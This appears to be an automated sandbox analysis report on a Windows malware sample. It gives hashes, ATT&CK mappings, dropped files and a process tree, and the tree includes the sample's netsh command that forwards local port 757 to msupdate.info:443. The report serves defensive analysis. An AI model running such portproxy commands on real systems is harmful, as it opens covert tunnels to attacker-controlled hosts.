4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981

General

Target

298a18db753d40380aa41c3cdde1825c.exe
Size

397KB
MD5

298a18db753d40380aa41c3cdde1825c
SHA1

a54eb952b7687bd8ad82c3934e3a3538547fb4a9
SHA256

4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981
SHA512

3260d9c83dda85aebaf6f46d9c8e6dabaeec0bc03a85f8a1591aebc33c450a5943187282b1a0323eea949bceb00f866aced663c8b3433792173198e15558d4c7

Score

8^/10

evasion persistence

Malware Config

Signatures

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Windows directory 2 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exe

description	ioc	process
File created	C:\Windows\SoftwareDistribution\config.xml	298a18db753d40380aa41c3cdde1825c.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	298a18db753d40380aa41c3cdde1825c.exe

Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

1356 NETSTAT.EXE
1248 NETSTAT.EXE
1668 NETSTAT.EXE
1588 NETSTAT.EXE
1768 NETSTAT.EXE
1112 NETSTAT.EXE

pid	process
1356	NETSTAT.EXE
1248	NETSTAT.EXE
1668	NETSTAT.EXE
1588	NETSTAT.EXE
1768	NETSTAT.EXE
1112	NETSTAT.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exe

pid	process
1640	298a18db753d40380aa41c3cdde1825c.exe
1640	298a18db753d40380aa41c3cdde1825c.exe
1640	298a18db753d40380aa41c3cdde1825c.exe
1640	298a18db753d40380aa41c3cdde1825c.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

description	pid	process
Token: SeDebugPrivilege	1640	298a18db753d40380aa41c3cdde1825c.exe
Token: SeRestorePrivilege	1088	msiexec.exe
Token: SeTakeOwnershipPrivilege	1088	msiexec.exe
Token: SeSecurityPrivilege	1088	msiexec.exe
Token: SeDebugPrivilege	1356	NETSTAT.EXE
Token: SeDebugPrivilege	1248	NETSTAT.EXE
Token: SeDebugPrivilege	1668	NETSTAT.EXE
Token: SeDebugPrivilege	1588	NETSTAT.EXE
Token: SeDebugPrivilege	1768	NETSTAT.EXE
Token: SeDebugPrivilege	1112	NETSTAT.EXE

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.execsc.exe

description	pid	process	target process
PID 1640 wrote to memory of 1832	1640	298a18db753d40380aa41c3cdde1825c.exe	csc.exe
PID 1640 wrote to memory of 1832	1640	298a18db753d40380aa41c3cdde1825c.exe	csc.exe
PID 1640 wrote to memory of 1832	1640	298a18db753d40380aa41c3cdde1825c.exe	csc.exe
PID 1832 wrote to memory of 1880	1832	csc.exe	cvtres.exe
PID 1832 wrote to memory of 1880	1832	csc.exe	cvtres.exe
PID 1832 wrote to memory of 1880	1832	csc.exe	cvtres.exe
PID 1640 wrote to memory of 1096	1640	298a18db753d40380aa41c3cdde1825c.exe	chcp.com
PID 1640 wrote to memory of 1096	1640	298a18db753d40380aa41c3cdde1825c.exe	chcp.com
PID 1640 wrote to memory of 1096	1640	298a18db753d40380aa41c3cdde1825c.exe	chcp.com
PID 1640 wrote to memory of 1976	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1976	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1976	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1356	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1356	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1356	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1248	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1248	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1248	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1668	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1668	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1668	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1644	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1644	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1644	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1048	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1048	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1048	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1580	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1580	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1580	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1032	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1032	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1032	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 588	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 588	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 588	1640	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 1640 wrote to memory of 1588	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1588	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1588	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1768	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1768	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1768	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1112	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1112	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 1640 wrote to memory of 1112	1640	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE

C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe
"C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ukbrl7jn.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES397A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3969.tmp"
3⤵
PID:1880

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
2⤵
PID:1096

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:1976

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
2⤵
PID:1644

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:1048

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
2⤵
PID:1580

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:1032

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:588

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES397A.tmp
Filesize
1KB

MD5
62c305de8847fe799080e02eb1f08f61

SHA1
ed5c3befae5b7d33db829558892cf32f621ba4b3

SHA256
4dc9a74120b23dc7d6ecd49dedc1247bf7d1a196e4ff41a0d238d5e4d7dac06d

SHA512
85562aec2fd469bc3456a2e6bc0ba95eaf0ca851f256090561c166296708819110916503f96312af22fb93b7736fe31206a20086c9b65e29ca650954dc4e68ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ukbrl7jn.dll
Filesize
3KB

MD5
f10b147b5a12ea606bd888f86db7f94a

SHA1
1c8025678033983991824ace5ce9409ea1f05777

SHA256
456b8dfd1f2d5c40d1dda5f6deea98450a42a526101cdf61d3c384c5c0f3fefd

SHA512
7200ef3bbf7ec3e6104498b63ebb02d4ff8513130cad96540577317e2eaced1f25267aaddbb50ccaa8cb792d30e167b4c29587cbce34b59e7bd85510bcb9b680

Download Submit
C:\Users\Admin\AppData\Local\Temp\ukbrl7jn.pdb
Filesize
11KB

MD5
92c79fe6a2d43771b785ee5b622af405

SHA1
b09b7344276911ac8f0fa17440abe6ab26a30793

SHA256
a3bfb91d232e61d1cf8e0dc8aac43d815154ac78f1ae06158a6019151896a582

SHA512
09ff3c5daf683f2de24ed753f29c3ac9fdb73e320d3f175310379529d892533478a03f21fe29eda6e414f70f0bc1dc120d95cfebd7dd0ad0e25e8801d3ba72c6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3969.tmp
Filesize
652B

MD5
a168b67ad501bb9e5e971d2883b73e61

SHA1
534774f262e3ed170a1f728318c9134292f47c51

SHA256
661bd518f03448aae28c952b24865de1276283e075f0e5c29225425e97da8b57

SHA512
c85614d275c095768234254a18af20e26bd0297ba9b3264877483efcd83653e3810251981ebf336e610005bc271613cef8c1440f15f7be84e32993a842eade08

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ukbrl7jn.0.cs
Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ukbrl7jn.cmdline
Filesize
309B

MD5
1f20ffcbf6b2d89c8e2d7160191fe4a7

SHA1
2f68c05e218af4918c1ec9412afbbc0e2c122f01

SHA256
b66e6846eced5bb580833a82a3d5c99fcca1c4840244f284de00c15fabe38a2b

SHA512
ecc2b05ba99a5243e7f598d731afccc4e71e1cb9c70f03e5d4ae80fc94f45a9ec0a94c19855a8b3ae1447f96c97b3def157f1bb82f26953b6c40567e036b60a9

Download Submit
memory/588-80-0x0000000000000000-mapping.dmp

Download
memory/1032-78-0x0000000000000000-mapping.dmp

Download
memory/1048-74-0x0000000000000000-mapping.dmp

Download
memory/1088-66-0x000007FEFBCF1000-0x000007FEFBCF3000-memory.dmp

Filesize
8KB

Download
memory/1096-65-0x0000000000000000-mapping.dmp

Download
memory/1112-84-0x0000000000000000-mapping.dmp

Download
memory/1248-70-0x0000000000000000-mapping.dmp

Download
memory/1356-69-0x0000000000000000-mapping.dmp

Download
memory/1580-76-0x0000000000000000-mapping.dmp

Download
memory/1588-82-0x0000000000000000-mapping.dmp

Download
memory/1640-56-0x000007FEF2620000-0x000007FEF317D000-memory.dmp

Filesize
11.4MB

Download
memory/1640-54-0x000007FEF4220000-0x000007FEF4C43000-memory.dmp

Filesize
10.1MB

Download
memory/1640-55-0x000007FEF3180000-0x000007FEF4216000-memory.dmp

Filesize
16.6MB

Download
memory/1644-72-0x0000000000000000-mapping.dmp

Download
memory/1668-71-0x0000000000000000-mapping.dmp

Download
memory/1768-83-0x0000000000000000-mapping.dmp

Download
memory/1832-57-0x0000000000000000-mapping.dmp

Download
memory/1880-60-0x0000000000000000-mapping.dmp

Download
memory/1976-67-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads